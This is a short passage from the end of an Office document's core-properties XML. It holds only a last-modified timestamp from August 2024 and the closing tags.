  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-16T13:45:44Z</dcterms:modified>
</cp:coreProperties>
</file>